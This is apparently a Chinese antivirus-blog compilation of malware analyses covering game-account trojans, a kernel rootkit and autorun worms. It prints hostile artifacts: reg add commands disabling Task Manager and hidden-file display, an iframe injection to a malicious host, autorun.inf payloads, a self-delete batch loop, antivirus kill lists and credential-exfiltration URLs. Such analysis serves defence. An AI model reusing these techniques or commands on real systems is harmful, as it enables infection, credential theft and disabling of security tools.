启动下载线程后,病毒通过保存在病毒体偏移0处的原程序入口点地址返回正常执行文件。
“征途木马变种YMF”病毒技术细节
该病毒分为两部分:EXE部分负责关闭相关杀毒软件,修改注册表自启动,释放DLL并注库.DLL部分负责具体的偷取过程,自我保护等.
一,EXE部分:
病毒运行后先使用OpenEvent打开一个"ZHGHAKUIQIQOSWW_ZT"的事件,如果打开成功,则直接退出,如果没有该事件,则使用CreateEvent创建该事件,以便保证在当前系统内只有一个实例在运行.
病毒使用Process32First,Process32Next遍历系统进程,查找"Twister.exe(费尔杀毒软件进程)","FilMsg.exe"一旦发现该进程存在系统中,则使用OpenProcess,TerminateProcess关掉该进程.
病毒使用CreateThread创建两个线程.
线程一:遍历进程,一旦发现进程中存在"RavMon.exe(瑞星杀毒软件进程)",使用OpenProcess打开该进程,使用Thread32First,Thread32Next遍历该进程中的线程,在EnumThreadWindows的CallBack函数中使用PostMessage向该进程发送WM_Command消息,关闭瑞星杀毒软件.
线程二:使用FindWindow查找AVP.AlertDialog和AVP.Product_Notification窗口,如果发现窗口存在,则向"允许"和"跳过"两个Button上使用SendMessage发送WM_LBUTTONUP和WM_LBUTTONDOWN消息.则AVP杀毒软件的预警系统失效.
病毒使用GetSystemDirectory得到%SYSTEM32%目录,从自身资源中释放出DLL并复制到%SYSTEM32%目录命名为55550.dll,再使用LoadLibrary加载该DLL.
至此,EXE工作结束.
二,DLL部分:
病毒遍历进程查找"zhengtu.dat"当发现该进程时,病毒使用ReadProcessMemory从游戏进程中读取所需的信息,再发送到指定的网址上,
http://pt.xx.vc/ok/zt/lin.asp
病毒会使用WriteProcessMemory往explorer.exe进程中注入一段远程代码,该代码的作用就是循环查找%SYSTEM32%目录中的55550.dll是否存在,如果发现病毒DLL文件已经不存在,则重新写入一个新的DLL进去,达到自我保护的目的.
“天龙八部木马变种JKG”病毒技术细节
如果没有成功则每隔15遍历进程查找进程中是否存在卡巴斯基反病毒软件进程avp.exe,如果存在则把当前系统时间的年份改为2007,试图使该软件失效。
然后在System32路径下释放两个动态库文件qdshm.dll和addrtlhelp.dll。
然后遍历进程查找进程中是否有游戏进程Game.exe,如果存在则结束该进程,当用户再次启动游戏进程时把动态库通过远程线程注到游戏进程中;如果不存在则调用LoadLibrary 函数把动态库加载起来。
最后病毒运行完后会把自己删除。
qdshm.dll用来加载其他动态库:
动态库被加载起来后首先会找到System32路径下的kernel32.dll并试图删除该动态库,如果删除成功则退出。
如果没有成功则根据自己所在进程进行不同操作:
1)如果是svchost.exe或者alg.exe进程则退出。
2)如果是Explorer.exe则调用OpenProcessToken、LookupPrivilegeValue、
AdjustTokenPrivileges函数提升自己权限,调用LoadLibrary 函数把qdshm.dll、mszs.dll两个动态库加载起来。
3)如果是其他进程则起一个线程每隔1秒从System32路径下加载各类偷密码的动态库具体如下:
C:\WINDOWS\system32\SHQZatl.dll、C:\WINDOWS\system32\LRTWatl.dll、
C:\WINDOWS\system32\GZGDatl.dll、C:\WINDOWS\system32\GFSJatl.dll…addrtlhelp.dll盗取并发送用户帐号密码
该动态库被加载起来后首先会找到System32路径下的kernel32.dll并试图删除该动态库,如果删除成功则退出。
如果没有成功则查看加载自己的进程,如果是Explorer.exe则起一个线程调用SetWindowsHookEx函数挂接鼠标键盘钩子并创建一个名为__D_的互斥体;如果是游戏进程则查找游戏登陆窗口TianLongBaBu WndClass,记录用户输入的帐户密码并发送到指定地址http://www.ccjj68.cn/yctl200/lin.asp
“反病毒杀手Rootkit”病毒技术细节
1、禁止反病毒软件的运行:
病毒调用PsSetLoadImageNotifyRoutine函数注册镜像加载的通知例程,在通知例程中,病毒首先比较加载的镜像的名称是否包含下名称:
vsdatant.sys,watchdog.sys,zclient.exe,bcfilter.sys,bcftdi.sys,bc_hassh_f.sys,
bc_ip_f.sys,bc_ngn.sys,bc_pat_f.sys,bc_prt_f.sys,bc_tdi_f.sys,filtnt.sys,
sandbox.sys,mpfirewall.sys,msssrv.exe,mcshield.exe,fsbl.exe,avz.exe,
avp.exe,avpm.exe,kav.exe,kavss.exe,kavsvc.exe,klswd.exe,ccapp.exe,
ccevtmgr.exe,ccpxysvc.exe,iao.exe,issvc.exe,rtvscan.exe,savscan.exe,bdss.exe,
bdmcon.exe,livesrv.exe,cclaw.exe,fsav32.exe,fsm32.exe,gcasserv.exe,icmon.exe,
inetupd.exe,nod32krn.exe,nod32ra.exe,pavfnsvr.exe,Windows-KB890830-V1.32.exe
对于包含上名称的镜像,病毒检查其是否是有效的PE文件,如是则调用ZwOpenProcess、ZwTerminateProcess函数禁止其运行,以此来禁止反病毒软件、防火墙等安全软件的运行。
2、挂接API:
病毒通过修改cr0寄存器标志位的方法关闭写保护,然后替换KeServiceDescriptorTable中的函数地址来Hook API,并记下原函数的地址。病毒挂接了如下两个API:
ZwQueryDirectoryFile
ZwEnumerateValueKey
3、ZwQueryDirectoryFile钩子过程:
在这个钩子过程中,病毒调用记录的原函数地址调用ZwQueryDirectoryFile函数,然后比较得到的目录、文件名中是否包含"kernelw"字符串,如果包含将返回STATUS_NO_MORE_FILES,反之,将正常的结果返回。
病毒通过挂钩ZwQueryDirectoryFile来隐藏包含有"kernelw"名称的目录或文件,以此来保护自己。
4、ZwEnumerateValueKey钩子例程:
在这个钩子过程中,病毒调用记录的原函数地址调用ZwEnumerateValueKey函数,然后比较得到的节果中的键值是否包含"kernelw"字符串,如果包含则返回错误,反之,将正常的结果返回。
病毒通过挂钩ZwEnumerateValueKey来隐藏键值包含有"kernelw"名称键值,以此来保护自己。
5、钩子保护线程:
病毒通过调用PsCreateSystemThread启动一个新的线程,在这个线程中不断循环检测KeServiceDescriptorTable表中自己挂钩的ZwQueryDirectoryFile、ZwEnumerateValueKey的地址是否被改变,如被改变则再次挂接这两个函数。
6、锁定ntoskrnl.exe文件
病毒通过调用ZwCreateFile、NtLockFile方式锁定ntoskrnl.exe文件,以此来防止其它程序通过读取ntoskrnl.exe中的数据恢复KeServiceDescriptorTable,以此来保护自己的API钩子。
“反病毒终结者变种N”病毒技术细节
病毒生成文件名的方法:用GetLocalTime得到当前系统时间,以月份跟得到的秒数为文件名,扩展名为.OCX。
我们在分析的时候得到的是12月7秒,文件名为:127.OCX。
2、利用rundll32.exe来加载自己释放的文件。并把rundll32.exe %system32%127.ocx加入到启动项。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
Load = rundll32.exe %sysetm32%127.ocx
3、等1.5秒后把自己删除。
病毒自删除方法比较特别,先用DeleteFileA去检查病毒本身是否已被删除,然后用MoetFile把自己移动到回收站,在用MoveFile把回收站中的病毒文件加入到重启后删除列表中。
4、OCX文件加载成功后,病毒利用全局钩子,在每一个进程中插入一个127.ocx。
(1)HOOK个每个进程中的API来隐藏自己
HOOK的API有
RegOpenKeyExA
CreateFileA
CreateFileW
RegEnumValueA
RegEnumValueW
从HOOK的API可以看出,用户是无法在正常方式下,查看到病毒的文件,和在注册表中加入的内容。
(2)对AVP杀软的情况,病毒使用的手法:
当检查到系统中是否AVP的进程时,把当前系统的时间修改为:现在的时间减去10年
如:现在是2007 被病毒改后,就会是1997年,这样会使AVP失效。
(3)对于一些反流氓软件的情况,病毒使用的手法:
当有程序要运行时,病毒会检查当前运行的文件名含有以下列表中的文件时,会把当前运行文件的里程结束,并且把文件移动到Windwos的TEMP目录下改名__.%s.tmp。
病毒会遍历指定的目录下去查找下面文件,当查找到文件后,会把文件移动到TEMP目录下改名为__%s.tmp.
病毒查找的文件有:
mmskskin.dll
KKClean.dll
VirUnk.def
ntiActi.dll
Rsaupd.exe
Iereset.dll
KASearch.DLL
KAVBootC.sys
Ras. exe
iehelp.exe
trojandetector.exe
KAConfig.DLL
KAVPassp.DLL
hsfw.dll
ollydbg.ini
Libclsid.dat
KNetWch.SYS
CleanHis.dll
WoptiClean.sys
kakalib.def
libdll.dat
kkinst.ini
wopticlean
360safe
(4)对于其它杀软件的处理
遍历文件时,同时获得文件的版本信息,当发现下列住处时,会把文件删除
Kingsoft Antivirus
Kingsoft Antispyware
TrojanDetector
Micropoint
Kingsoft
Duba
4、修改文件的访问根权。
病毒利用cacls.exe Filename /T /E /C /P everyone:N的方式,把磁盘上文件设置为共享,让所有人可以使用文件。
“注入木马下载器变种RJH”病毒技术细节
初始化操作:
病毒首先会把系统时间改为2005-10-31,使得卡巴斯基杀毒软件失效。
然后遍历进程查找进程中是否存在以下反病毒软件进程,如果存在,则结束进程:
360rpt.exe、360Safe.exe、360tray.exe、adam.exe、AgentSvr.exe、AppSvc32.exe、autoruns.exe、avgrssvc.exe、AvMonitor.exe、avp.com、avp.exenod32krn.exe、nod32kui.exe、PFW.exe、PFWLiveUpdate.exe、QHSET.exe、Ras.exe、Rav.exe、RavMon.exe、RavMonD.exe…
然后添加以下注册表项实现映像劫持,使得用户启动以下进程时启动病毒程序:
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions
\360rpt.exe\Debugger = "C:\WINDOWS\system32\guangd.exe"
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions
\IceSword.exe\Debugger = "C:\WINDOWS\system32\guangd.exe"…
然后在System32路径下释放病毒程序guangd.exe并添加以下注册表启动项实现自启动
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"DsNiu" = C:\WINDOWS\system32\guangd.exe
然后病毒会遍历磁盘,把自己命名为guangd.exe拷贝到所有的磁盘中,添加autorun.inf得用户双击打开磁盘时同时运行病毒
然后把System32的释放的病毒程序运行起来,最后病毒会在TEMP文件夹中释放自删除文件~DsNiu!.bat把自己删除。
下载操作:
病毒会启动两个svchost.exe进程,然后病毒会用自身内存映像覆盖这两个svchost.exe进程的内存空间,使用户认为该进程是正常的系统进程,同时这两个进程会互相进行保护,如果这两个进程中的任意一个进程被用户结束,则另一个进程会重新运行病毒程序,使得用户无法手动结束该进程。
病毒会每隔60秒从http://bibo.xxxx.org/gdxiazai.txt网址下载病毒程序并运行。
“鲁欧蠕虫”病毒技术细节
病毒运行后,使用GetSystemDirectory获得系统%SYSTEM32%目录,并将自身复制过去.
病毒使用CreateMutexA创建一个"SOS"的互斥,保证当前只有一个实例在运行.
病毒会在当前目前中创建一个和病毒名相同的bat文件并运行,其中BAT文件的内容为:
:try
del %FILENAME%
if exist %FILENAME% goto try
del %0
病毒会遍历本地所有磁盘,在后缀为htm的文件的最后一行添加如下代码:
<iframe src="http://www.XXXX.cn/all/index.htm?a" width="50" height="0"></iframe>
病毒会使用ShellExecuteA和Winexec运行下列代码,修改注册表:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v
DisableWindowsUpdateAccess /t REG_dword/d 00000001 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
/v DisableTaskMgr /t REG_dword /d
00000001 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced"
/v Hidden /t reg_dWord /d 00000000 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
/v HideFileExt /t reg_dword /d 00000001 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
/v ShowSuperHidden /t reg_dword /d
00000000 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
/v ShowSuperHidden /t reg_dword /d
00000000 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\SHOWALL" /v CheckedValue /t
REG_SZ /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\NOHIDDEN" /v CheckedValue /t
REG_dword /d 00000002 /f
病毒会使用UrlDownloadFile从网址http://www.XXXX.cn/xzz/xxxxx下载这个文件并保存在C:\WINNT\System32\FSEc.COM的位置上
如果下载失败,则继续从网址http://www.XXXX.cn/xzz/xxxxx下载另一个文件保存在C:\WINNT\SYSTEM32\Stvch.exe的位置上,并运行
病毒会使用SetSystemTime将系统时间改为2000年,这么做的目的很明显是为了使AVP杀毒软件失效.
最后病毒,使用SetTimer函数,在回调中,向本地所有磁盘写入autorun.inf和病毒本身,其中autorun.inf的内容为:
[AuToRuN]
open=soS.Exe
shell\open=打开(&O)
shell\open\Command=soS.Exe
shell\open\Default=1
“反病毒杀手变种CR”病毒技术细节
1.准备阶段:
创建名为"moomak"的互斥量,保证用户系统中只有病毒的一个实体运行。
2.病毒代码主要实现如下功能:
(1)写system.ini文件,实现启动自动加载
病毒会修改system.ini,内容如下:
SYSTEM.INI\BOOT
"SHELL" = EXPLORER.EXE APPDLLMAN.EXE
这样当系统启动加载Explorer.exe时,会将appdllman.exe文件自动加载起来。
(2)提升自身权限
病毒会调用SeDebugPrivilege、AdjustTokenPrivileges等API函数,实现将权限提升,方便后面的病毒功能实现。
(3)监视系统进程
<1>.病毒会查找指定安全产品和系统调试工具的进程,结束其进程;编辑注册表,添加这些文件的映像劫持调试关联项,将该关联指向病毒文件,当用户启动这些安全产品文件时,会将病毒文件启动起来。
修改注册表内容格式如下:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\指定文件名
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
指定文件名\debugger = "c:\windows\system32\appdllman.exe"
病毒查找的安全产品的主文件对应的进程名(指定文件名)如下:
"360tray.exe","360safe.exe","Ras.exe","clean.exe","HijackThis.exe",
"RogueCleaner.exe","KVXP.kxp","KVCenter.kxp","TrojDie.kxp",
"regedit.exe","msconfig.exe","taskmgr.exe"等。
<2>.病毒会结束指定的安全产品的服务
病毒会调用ControlService函数,将其参数设为SERVICE_CONTROL_STOP,结束指定服务后将其服务删除。
指定服务如下:
"RogueCleaner.exe","cltnetcnservice","eectrl","NOD32krn","Schedule","sharedaccess",
"RsCCenter","RsRavMon","KVWSC"等。
(4)复制文件到系统指定目录下,指定路径如下:
"c:\\windows\\system32\\appdllman.exe"
(5)构造并拷贝Autorun.inf文件
在最初病毒体同目录下创建Autorun.inf文件,内容如下:
[AutoRun]
open=appdllman.exe
shell\open=打开(&O)
shell\open\Command=appdllman.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=appdllman.exe
在没有关闭自动播放功能的系统中,如用户以双击鼠标左键、单击右键选择打开或资源管理器打开磁盘时,会将Autorun.inf中写入的关联文件appdllman.exe启动起来(其中appdllman.exe和最初的病毒样本名相同)。
病毒会将生成的Autorun.inf文件复制到系统中磁盘类型为DRIVE_REMOVABLE和DRIVE_FIXED的根目录下,并将病毒文件以Autorun.inf中关联的文件名复制到同路径下。
(6)下载指定可疑文件并运行
下载列表为:
http://{BLOCKED} /mm/mh.exe
http://{BLOCKED}/mm/zt.exe
http://{BLOCKED}/mm/wo.exe
http://{BLOCKED}/mm/dh.exe
http://{BLOCKED}/mm/chd.exe
http://{BLOCKED}/mm/my.exe
http://{BLOCKED}/mm/qq.exe
http://{BLOCKED}/mm/tl.exe
http://{BLOCKED}/mm/wd.exe
http://{BLOCKED}/mm/zx.exe
http://{BLOCKED}/mm/wl.exe
http://{BLOCKED}/mm/cs.exe
http://{BLOCKED}/mm/jh.exe
http://{BLOCKED}/mm/func.exe
存储名为:
c:\windows\system32\func.dll
c:\windows\system32\svch0st.exe
c:\windows\system32\svch0st1.exe
c:\windows\system32\svch0st2.exe
c:\windows\system32\svch0st3.exe
c:\windows\system32\svch0st4.exe
c:\windows\system32\svch0st5.exe
c:\windows\system32\svch0st6.exe
c:\windows\system32\svch0st7.exe
c:\windows\system32\svch0st8.exe
c:\windows\system32\svch0st9.exe
c:\windows\system32\svch0st10.exe
c:\windows\system32\svch0st11.exe
c:\windows\system32\svch0st13.exe
(7)修改注册表
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"realplayer" = |?
(8)起线程判断网络连接
病毒会创建NetBIOSThread的互斥量,每隔1秒判断系统联网状态,如果系统联网则创建自身连接。
(9)构造并运行Deleteme.bat
创建名为_deleteme.bat的脚本文件,功能为当病毒运行后,删除最初的病毒体,并删除该脚本自身。
3.该病毒特点
(1)病毒具有较强的反杀毒软件反调试功能,病毒清除过程较为复杂。
(2)病毒支持文件下载,对用户造成的实际危害较难预测,但具备造成极大危害的可能性,并可通过此手段方便的进行病毒体的更新。
评论
Powered by 
Copyright © 小宝 & GardenOnline Networks, Inc.
Copyright © 小宝 & GardenOnline Networks, Inc.